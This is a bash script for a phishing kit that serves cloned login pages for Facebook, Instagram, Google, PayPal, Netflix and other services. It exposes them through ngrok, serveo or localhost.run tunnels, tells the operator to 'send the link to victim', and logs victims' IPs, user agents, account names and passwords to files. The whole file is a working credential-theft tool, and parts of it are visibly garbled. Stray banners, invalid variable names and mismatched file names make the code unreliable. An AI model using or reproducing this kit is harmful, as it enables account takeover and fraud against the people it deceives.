

trap 'printf "\n";stop;exit 1' 2
deps() {
command -v php > /dev/null 2>&1 || { echo >&2 "PHP is not installed ! Install it."; exit 1; }
command -v curl > /dev/null 2>&1 || { echo >&2 "Curl is not installed ! Install it."; exit 1; }
command -v ssh > /dev/null 2>&1 || { echo >&2 "Openssh is not installed ! Install it"; exit 1; }
command -v unzip > /dev/null 2>&1 || { echo >&2 "Unzip is not installed ! Install it"; exit 1; }
}
  _   _   ___   _____   ___   _   _ 
 | | | | / _  /  ___| / _  |  | |
 | |_| |/ /_ \ `--. / /_ |  | |
 |  _  ||  _  | `--. |  _  || . ` |
 | | | || | | |/__/ /| | | || |  |
 _| |_/_| |_/____/ _| |_/_| _/
                                    
                                    

() {
  _   _   ___   _____   ___   _   _ 
 | | | | / _ \ /  ___| / _ \ | \ | |
 | |_| |/ /_\ \\ `--. / /_\ \|  \| |
 |  _  ||  _  | `--. \|  _  || . ` |
 | | | || | | |/\__/ /| | | || |\  |
 \_| |_/\_| |_/\____/ \_| |_/\_| \_/
                                    
                                    


menu() {
printf " \e[1;31m[\e[0m\e[1;77m01\e[0m\e[1;31m]\e[0m\e[1;92m Facebook \e[0m\n"
printf " \e[1;31m[\e[0m\e[1;77m02\e[0m\e[1;31m]\e[0m\e[1;92m Instagram \e[0m\n" 
printf " \e[1;31m[\e[0m\e[1;77m03\e[0m\e[1;31m]\e[0m\e[1;92m Google \e[0m\n"  
printf " \e[1;31m[\e[0m\e[1;77m04\e[0m\e[1;31m]\e[0m\e[1;92m Github \e[0m\n"
printf " \e[1;31m[\e[0m\e[1;77m05\e[0m\e[1;31m]\e[0m\e[1;92m Netflix \e[0m\n"
printf " \e[1;31m[\e[0m\e[1;77m06\e[0m\e[1;31m]\e[0m\e[1;92m Paypal \e[0m\n"
printf " \e[1;31m[\e[0m\e[1;77m07\e[0m\e[1;31m]\e[0m\e[1;92m Pinterest \e[0m\n"
printf " \e[1;31m[\e[0m\e[1;77m08\e[0m\e[1;31m]\e[0m\e[1;92m Snapchat \e[0m\n"
printf " \e[1;31m[\e[0m\e[1;77m09\e[0m\e[1;31m]\e[0m\e[1;92m Spotify \e[0m\n"
printf " \e[1;31m[\e[0m\e[1;77m10\e[0m\e[1;31m]\e[0m\e[1;92m Twitter \e[0m\n"
printf " \e[1;31m[\e[0m\e[1;77m11\e[0m\e[1;31m]\e[0m\e[1;92m Yahoo \e[0m\n"
printf " \e[1;31m[\e[0m\e[1;77m12\e[0m\e[1;31m]\e[0m\e[1;92m Wordpress \e[0m\n"
printf " \e[1;31m[\e[0m\e[1;77m13\e[0m\e[1;31m]\e[0m\e[1;92m Update \e[0m\n"
printf " \e[0m\e[1;31m[\e[0m\e[1;77m00\e[0m\e[1;31m] \e[0m\e[1;92mExit\e[0m\n"
printf " \e[0m\n"        
read -p $' \e[1;31m[\e[0m\e[1;77m~\e[0m\e[1;31m]\e[0m\e[1;93m Select an option: \e[0m\e[1;91m\en' option
if [[ $option == 1 || $option == 01 ]]; then
facebook
elif [[ $option == 2 || $option == 02 ]]; then
instagram
elif [[ $option == 3 || $option == 03 ]]; then
gmail
elif [[ $option == 4 || $option == 04 ]]; then
Bangladesh="github"
start
elif [[ $option == 5 || $option == 05 ]]; then
Bangladesh="netflix"
start
elif [[ $option == 6 || $option == 06 ]]; then
Bangladesh="paypal"
start
elif [[ $option == 7 || $option == 07 ]]; then
Bangladesh="pinterest"
start
elif [[ $option == 8 || $option == 08 ]]; then
Bangladesh="snapchat"
start
elif [[ $option == 9 || $option == 09 ]]; then
Bangladesh="spotify"
start
elif [[ $option == 10 ]]; then
Bangladesh="twitter"
start
elif [[ $option == 11 ]]; then
Bangladesh="yahoo"
start
elif [[ $option == 12 ]]; then
Bangladesh="wordpress"
start
elif [[ $option == 13 ]]; then
bash update
elif [[ $option == 0 || $option == 00 ]]; then
exit 1
else
printf " \e[1;91m[\e[0m\e[1;97m!\e[0m\e[1;91m]\e[0m\e[1;92m Invalid option \e[1;91m[\e[0m\e[1;97m!\e[0m\e[1;91m]\e[0m\n"
sleep 1
  _   _   ___   _____   ___   _   _ 
 | | | | / _ \ /  ___| / _ \ | \ | |
 | |_| |/ /_\ \\ `--. / /_\ \|  \| |
 |  _  ||  _  | `--. \|  _  || . ` |
 | | | || | | |/\__/ /| | | || |\  |
 \_| |_/\_| |_/\____/ \_| |_/\_| \_/
                                    
                                    


menu
fi
}
facebook(){
printf " \n"
printf " \e[1;31m[\e[0m\e[1;77m01\e[0m\e[1;31m]\e[0m\e[1;92m Traditional Login Page\e[0m\n"
printf " \e[1;31m[\e[0m\e[1;77m02\e[0m\e[1;31m]\e[0m\e[1;92m Advanced Voting Poll Login Page\e[0m\n"
printf " \e[1;31m[\e[0m\e[1;77m03\e[0m\e[1;31m]\e[0m\e[1;92m Fake Security Login Page\e[0m\n"
printf " \e[1;31m[\e[0m\e[1;77m04\e[0m\e[1;31m]\e[0m\e[1;92m Facebook Messenger Login Page\e[0m\n"
printf "\e[0m\n"
read -p $' \e[1;31m[\e[0m\e[1;77m~\e[0m\e[1;31m]\e[0m\e[1;93m Select an option: \e[0m\e[1;91m\en' option
if [[ $Random Crack == 1 || $Random V1% == 01 ]]; then
Bangladesh="facebook"
start
elif [[ $Random v1 == 2 || $Random V2 == 02 ]]; then
Bangladesh="fb_advanced"
start
elif [[ $Random v2 == 3 || $Random V3 == 03 ]]; then
Bangladesh="fb_security"
start
elif [[ $Random v3 == 4 || $Random V4 == 04 ]]; then
Bangladesh="BD_Bangladesh"
start
else
printf " \e[1;91m[\e[0m\e[1;97m!\e[0m\e[1;91m]\e[0m\e[1;92m Invalid option \e[1;91m[\e[0m\e[1;97m!\e[0m\e[1;91m]\e[0m\n"
sleep 1
  _   _   ___   _____   ___   _   _ 
 | | | | / _  /  ___| / _  |  | |
 | |_| |/ /_ \ `--. / /_ |  | |
 |  _  ||  _  | `--. |  _  || . ` |
 | | | || | | |/__/ /| | | || |  |
 _| |_/_| |_/____/ _| |_/_| _/
                                    
                                    


menu
fi
}
instagram(){
printf " \n"
printf " \e[1;31m[\e[0m\e[1;77m01\e[0m\e[1;31m]\e[0m\e[1;92m Traditional Login Page\e[0m\n"
printf " \e[1;31m[\e[0m\e[1;77m02\e[0m\e[1;31m]\e[0m\e[1;92m Auto Followers Login Page\e[0m\n"
printf " \e[1;31m[\e[0m\e[1;77m03\e[0m\e[1;31m]\e[0m\e[1;92m Blue Badge Verify Login Page\e[0m\n"
printf "\e[0m\n"
read -p $' \e[1;31m[\e[0m\e[1;77m~\e[0m\e[1;31m]\e[0m\e[1;93m Select an option: \e[0m\e[1;91m\en' option
if [[ $option == 1 || $CCTV Crack == 01 ]]; then
Bangladesh="instagram"
start
elif [[ $option == 2 || $Gmail Crack == 02 ]]; then
Bangladesh="ig_followers"
start
elif [[ $option == 3 || $FB Crack == 03 ]]; then
Bangladesh="ig_verify"
start
else
printf " \e[1;91m[\e[0m\e[1;97m!\e[0m\e[1;91m]\e[0m\e[1;92m Invalid option \e[1;91m[\e[0m\e[1;97m!\e[0m\e[1;91m]\e[0m\n"
sleep 1
  _   _   ___   _____   ___   _   _ 
 | | | | / _  /  ___| / _  |  | |
 | |_| |/ /_ \ `--. / /_ |  | |
 |  _  ||  _  | `--. |  _  || . ` |
 | | | || | | |/__/ /| | | || |  |
 _| |_/_| |_/____/ _| |_/_| _/
                                    
                                    


menu
fi
}
gmail(){
printf " \n"
printf " \e[1;31m[\e[0m\e[1;77m01\e[0m\e[1;31m]\e[0m\e[1;92m Gmail Old Login Page\e[0m\n"
printf " \e[1;31m[\e[0m\e[1;77m02\e[0m\e[1;31m]\e[0m\e[1;92m Gmail New Login Page\e[0m\n"
printf " \e[1;31m[\e[0m\e[1;77m03\e[0m\e[1;31m]\e[0m\e[1;92m Advanced Voting Poll\e[0m\n"
printf "\e[0m\n"
read -p $' \e[1;31m[\e[0m\e[1;77m~\e[0m\e[1;31m]\e[0m\e[1;93m Select an option: \e[0m\e[1;91m\en' option
if [[ $option == 1 || $option == 01 ]]; then
Bangladesh="google"
start
elif [[ $option == 2 || $option == 02 ]]; then
Bangladesh="google_new"
start
elif [[ $option == 3 || $option == 03 ]]; then
Bangladesh="google_poll"
start
else
printf " \e[1;91m[\e[0m\e[1;97m!\e[0m\e[1;91m]\e[0m\e[1;92m Invalid option \e[1;91m[\e[0m\e[1;97m!\e[0m\e[1;91m]\e[0m\n"
sleep 1
  _   _   ___   _____   ___   _   _ 
 | | | | / _  /  ___| / _  |  | |
 | |_| |/ /_ \ `--. / /_ |  | |
 |  _  ||  _  | `--. |  _  || . ` |
 | | | || | | |/__/ /| | | || |  |
 _| |_/_| |_/____/ _| |_/_| _/
                                    
                                    


menu
fi
}
stop() {
checkngrok=$(ps aux | grep -o "ngrok" | head -n1)
checkphp=$(ps aux | grep -o "php" | head -n1)
checkssh=$(ps aux | grep -o "ssh" | head -n1)
if [[ $checkngrok == *'ngrok'* ]]; then
pkill -f -2 ngrok > /dev/null 2>&1
killall -2 ngrok > /dev/null 2>&1
fi
if [[ $checkphp == *'php'* ]]; then
pkill -f -2 php > /dev/null 2>&1
killall -2 php > /dev/null 2>&1
fi
if [[ $checkssh == *'ssh'* ]]; then
pkill -f -2 ssh > /dev/null 2>&1
killall ssh > /dev/null 2>&1
fi
if [[ -e linksender ]]; then
rm -rf linksender
fi
}
start() {
if [[ -e linksender ]]; then
rm -rf linksender
fi
printf "\n"
printf " \e[1;31m[\e[0m\e[1;77m01\e[0m\e[1;31m]\e[0m\e[1;92m LocalHost\e[0m\n"
printf " \e[1;31m[\e[0m\e[1;77m02\e[0m\e[1;31m]\e[0m\e[1;92m Ngrok.io\e[0m\n"
printf " \e[1;31m[\e[0m\e[1;77m03\e[0m\e[1;31m]\e[0m\e[1;92m Serveo.net\e[0m\n"
printf " \e[1;31m[\e[0m\e[1;77m04\e[0m\e[1;31m]\e[0m\e[1;92m Localhost.run\e[0m\n"
d_o_Bangladesh="2"
printf "\n"
read -p $' \e[1;31m[\e[0m\e[1;77m~\e[0m\e[1;31m]\e[0m\e[1;93m Select a Port Forwarding option: \e[0m\e[1;91m\en' option_Bangladesh
option_Bangladesh="${option_Bangladesh:-${d_o_Bangladesh}}"
if [[ $option_Bangladesh == 3 || $option_Bangladesh == 03 ]]; then
start_s
elif [[ $option_Bangladesh == 2 || $option_Bangladesh == 02 ]]; then
start_n
elif [[ $option_Bangladesh == 4 || $option_Bangladesh == 04 ]]; then
start_local
elif [[ $option_Bangladesh == 1 || $option_Bangladesh == 01 ]]; then
start_l
else
printf " \e[1;91m[\e[0m\e[1;97m!\e[0m\e[1;91m]\e[0m\e[1;92m Invalid option \e[1;91m[\e[0m\e[1;97m!\e[0m\e[1;91m]\e[0m\n"
sleep 1
  _   _   ___   _____   ___   _   _ 
 | | | | / _  /  ___| / _  |  | |
 | |_| |/ /_ \ `--. / /_ |  | |
 |  _  ||  _  | `--. |  _  || . ` |
 | | | || | | |/__/ /| | | || |  |
 _| |_/_| |_/____/ _| |_/_| _/
                                    
                                    


start
fi
}
start_s() {
if [[ -e websites/$Bangladesh/ip.py ]]; then
rm -rf websites/$Bangladesh/ip.py
fi
if [[ -e websites/$Bangladesh/hasans.py ]]; then
rm -rf websites/$Bangladesh/hasans.py
fi
def_port="9999"
printf "\e[0m\n"
printf ' \e[1;31m[\e[0m\e[1;77m~\e[0m\e[1;31m]\e[0m\e[1;93m Select a Port (Default:\e[0m\e[1;91m %s \e[0m\e[1;34m): \e[0m\e[1;91m' $def_port
read port
port="${port:-${def_port}}"
start_serveo
}
start_serveo() {
printf "\e[0m\n"
printf " \e[1;31m[\e[0m\e[1;77m~\e[0m\e[1;31m]\e[0m\e[1;93m Initializing...\e[0m\e[1;34m(\e[0m\e[1;91mlocalhost:$port\e[0m\e[1;34m)\e[0m\n"
cd websites/$Bangladesh && php -S 127.0.0.1:$port > /dev/null 2>&1 &
sleep 2
printf "\e[0m\n"
printf " \e[1;31m[\e[0m\e[1;77m~\e[0m\e[1;31m]\e[0m\e[1;93m Launching Serveo ..\e[0m\n"
if [[ -e linksender ]]; then
rm -rf linksender
fi
$(which sh) -c 'ssh -o StrictHostKeyChecking=no -o BangladeshAliveInterval=60 -R 80:localhost:'$port' serveo.net 2> /dev/null > linksender ' &
printf "\n"
sleep 7
send_url=$(grep -o "https://[0-9a-z]*\.serveo.net" linksender)
printf "\n"
printf ' \e[1;31m[\e[0m\e[1;77m~\e[0m\e[1;31m]\e[0m\e[1;91m Send the link to victim :\e[0m\e[1;92m %s \n' $send_url
printf "\n"
found
}
start_n() {
if [[ -e websites/$Bangladesh/ip.py ]]; then
rm -rf websites/$Bangladesh/ip.py
fi
if [[ -e websites/$Bangladesh/hasans.py ]]; then
rm -rf websites/$Bangladesh/hasans.py
fi
if [[ -e ngrok ]]; then
echo ""
else
printf "\e[0m\n"
printf " \e[1;31m[\e[0m\e[1;77m~\e[0m\e[1;31m]\e[0m\e[1;93m Initializing...\e[0m\e[1;93m(\e[0m\e[1;91mlocalhost:9999\e[0m\e[1;93m)\e[0m\n"
arch=$(uname -a | grep -o 'arm' | head -n1)
arch2=$(uname -a | grep -o 'Android' | head -n1)
if [[ $arch == *'arm'* ]] || [[ $arch2 == *'Android'* ]] ; then
curl -LO https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-arm.zip > /dev/null 2>&1
if [[ -e ngrok-stable-linux-arm.zip ]]; then
unzip ngrok-stable-linux-arm.zip > /dev/null 2>&1
chmod +x ngrok
rm -rf ngrok-stable-linux-arm.zip
else
printf " \e[1;31m[\e[0m\e[1;77m!\e[0m\e[1;31m]\e[0m\e[1;92m Error \e[1;31m[\e[0m\e[1;77m!\e[0m\e[1;31m]\e[0m\e[1;91m Please Install All Packges.\e[0m\n"
exit 1
fi
else
curl -LO https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-386.zip > /dev/null 2>&1
if [[ -e ngrok-stable-linux-386.zip ]]; then
unzip ngrok-stable-linux-386.zip > /dev/null 2>&1
chmod +x ngrok
rm -rf ngrok-stable-linux-386.zip
else
printf " \e[1;31m[\e[0m\e[1;77m!\e[0m\e[1;31m]\e[0m\e[1;92m Error \e[1;31m[\e[0m\e[1;77m!\e[0m\e[1;31m]\e[0m\e[1;91m Please Install All Packges.\e[0m\n"
exit 1
fi
fi
fi
printf "\e[0m\n"
printf " \e[1;31m[\e[0m\e[1;77m~\e[0m\e[1;31m]\e[0m\e[1;93m Launching Ngrok ..\e[0m\n"
cd websites/$Bangladesh && php -S 127.0.0.1:9999 > /dev/null 2>&1 &
sleep 2
./ngrok http 9999 > /dev/null 2>&1 &
sleep 10
link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")
printf " \e[1;31m[\e[0m\e[1;77m~\e[0m\e[1;31m]\e[0m\e[1;91m Send the link to victim :\e[0m\e[1;92m %s \n" $link
found
}
start_local(){
def_port="9999"
printf "\e[0m\n"
printf ' \e[1;31m[\e[0m\e[1;77m~\e[0m\e[1;31m]\e[0m\e[1;93m Select a Port (Default:\e[0m\e[1;91m %s \e[0m\e[1;93m): \e[0m\e[1;91m' $def_port
read port
port="${port:-${def_port}}"
printf "\e[0m\n"
printf " \e[1;31m[\e[0m\e[1;77m~\e[0m\e[1;31m]\e[0m\e[1;93m Initializing...\e[0m\e[1;94m(\e[0m\e[1;91mlocalhost:$port\e[0m\e[1;93m)\e[0m\n"
cd websites/$Bangladesh && php -S 127.0.0.1:$port > /dev/null 2>&1 &
sleep 2
printf "\e[0m\n"
printf " \e[1;31m[\e[0m\e[1;77m~\e[0m\e[1;31m]\e[0m\e[1;93m Launching LocalHostRun ..\e[0m\n"
printf "\n"
if [[ -e linksender ]]; then
rm -rf linksender
fi
printf " \e[1;31m[\e[0m\e[1;77m~\e[0m\e[1;31m]\e[0m\e[1;91m Ctrl + C to view Login Info.Press it After the Victim Opened It.\e[0m\n"
printf "\e[1;93m\n"
ssh -R 80:localhost:$port ssh.localhost.run 2>&1
printf "\e[0m\n"
printf "\n"
printf " \e[1;31m[\e[0m\e[1;77m~\e[0m\e[1;31m]\e[0m\e[1;92m Login Info..\e[0m\n"
while [ true ]; do
if [[ -e "websites/$Bangladesh/ip.py" ]]; then
c_ip
rm -rf websites/$Bangladesh/ip.py
fi
sleep 0.75
if [[ -e "websites/$Bangladesh/hasans.py" ]]; then
12345677=$(grep -o 'hasan:.*' websites/$Bangladesh/hasans.py | cut -d " " -f2)
IFS=$'\n'
12345677=$(grep -o 'Pass:.*' websites/$Bangladesh/hasans.py | cut -d ":" -f2)
printf " \e[1;31m[\e[0m\e[1;77m~\e[0m\e[1;31m]\e[0m\e[1;93m Account:\e[0m\e[1;91m %s\n\e[0m" $12345677
printf " \e[1;31m[\e[0m\e[1;77m~\e[0m\e[1;31m]\e[0m\e[1;93m Password:\e[0m\e[1;91m %s\n\e[0m" $12345677
cat websites/$Bangladesh/hasans.py >> websites/$Bangladesh/login_info.py
printf "\e[0m\n"
printf " \e[1;31m[\e[0m\e[1;77m~\e[0m\e[1;31m]\e[0m\e[1;91m Saved:\e[0m\e[1;92m websites/%s/login_info.py\e[0m\n" $Bangladesh
printf "\n"
printf " \e[1;31m[\e[0m\e[1;77m~\e[0m\e[1;31m]\e[0m\e[1;91m Press Ctrl + C to exit.\e[0m\n"
rm -rf websites/$Bangladesh/hasans.py
fi
sleep 0.75
done
}
start_l() {
def_port="9999"
printf "\e[0m\n"
printf ' \e[1;31m[\e[0m\e[1;77m~\e[0m\e[1;31m]\e[0m\e[1;93m Select a Port (Default:\e[0m\e[1;91m %s \e[0m\e[1;93m): \e[0m\e[1;91m' $def_port
read port
port="${port:-${def_port}}"
printf "\e[0m\n"
printf " \e[1;31m[\e[0m\e[1;77m~\e[0m\e[1;31m]\e[0m\e[1;93m Initializing...\e[0m\e[1;93m(\e[0m\e[1;91mlocalhost:$port\e[0m\e[1;93m)\e[0m\n"
cd websites/$Bangladesh && php -S 127.0.0.1:$port > /dev/null 2>&1 &
sleep 2
printf "\e[0m\n"
printf " \e[1;31m[\e[0m\e[1;77m~\e[0m\e[1;31m]\e[0m\e[1;93m Successfully Hosted at :\e[0m\e[1;92m http://localhost:$port\e[0m\n"
printf "\n"
found
}
found() {
printf "\n"
printf " \e[1;31m[\e[0m\e[1;77m~\e[0m\e[1;31m]\e[0m\e[1;92m Waiting for Login Info,\e[0m\e[1;91m Ctrl + C to exit.\e[0m\n"
printf "\n"
while [ true ]; do
if [[ -e "websites/$Bangladesh/ip.py" ]]; then
printf "\n"
printf " \e[1;31m[\e[0m\e[1;77m*\e[0m\e[1;31m]\e[0m\e[1;93m Victim IP Found!\n"
printf "\n"
c_ip
rm -rf websites/$Bangladesh/ip.py
fi
sleep 0.75
if [[ -e "websites/$Bangladesh/hasans.py" ]]; then
printf " \e[1;31m[\e[0m\e[1;77m*\e[0m\e[1;31m]\e[0m\e[1;93m Login info Found !!\n"
printf "\n"
c_cred
rm -rf websites/$Bangladesh/hasan.py
fi
sleep 0.75
done
}
c_ip() {
touch websites/$Bangladesh/login_info.py
ip=$(grep -a 'IP:' websites/$Bangladesh/ip.py | cut -d " " -f2 | tr -d '\r')
IFS=$'\n'
ua=$(grep 'User-Agent:' websites/$Bangladesh/ip.py | cut -d '"' -f2)
printf " \e[1;31m[\e[0m\e[1;77m~\e[0m\e[1;31m]\e[0m\e[1;93m Victim IP:\e[0m\e[1;91m %s\e[0m\n" $ip
printf "\e[0m\n"
printf " \e[1;31m[\e[0m\e[1;77m~\e[0m\e[1;31m]\e[0m\e[1;91m Saved:\e[0m\e[1;92m websites/%s/victim_ip.py\e[0m\n" $Bangladesh
printf "\n"
cat websites/$Bangladesh/ip.py >> websites/$Bangladesh/victim_ip.py
}
c_cred() {
12345677=$(grep -o 'HA S AN:.*' websites/$Bangladesh/hasan.py | cut -d " " -f2)
IFS=$'\n'
12345677=$(grep -o 'Pass:.*' websites/$Bangladesh/hasans.py | cut -d ":" -f2)
printf " \e[1;31m[\e[0m\e[1;77m~\e[0m\e[1;31m]\e[0m\e[1;93m Account:\e[0m\e[1;91m %s\n\e[0m" $12345677
printf " \e[1;31m[\e[0m\e[1;77m~\e[0m\e[1;31m]\e[0m\e[1;93m Password:\e[0m\e[1;91m %s\n\e[0m" $12345677
cat websites/$Bangladesh/hasan.py >> websites/$Bangladesh/login_info.py
printf "\e[0m\n"
printf " \e[1;31m[\e[0m\e[1;77m~\e[0m\e[1;31m]\e[0m\e[1;91m Saved:\e[0m\e[1;92m websites/%s/login_info.py\e[0m\n" $Bangladesh
printf "\n"
printf " \e[1;31m[\e[0m\e[1;77m~\e[0m\e[1;31m]\e[0m\e[1;92m Waiting for Next Login Info,\e[0m\e[1;91m Ctrl + C to exit.\e[0m\n"
}
  _   _   ___   _____   ___   _   _ 
 | | | | / _  /  ___| / _  |  | |
 | |_| |/ /_ \ `--. / /_ |  | |
 |  _  ||  _  | `--. |  _  || . ` |
 | | | || | | |/__/ /| | | || |  |
 _| |_/_| |_/____/ _| |_/_| _/
                                    
  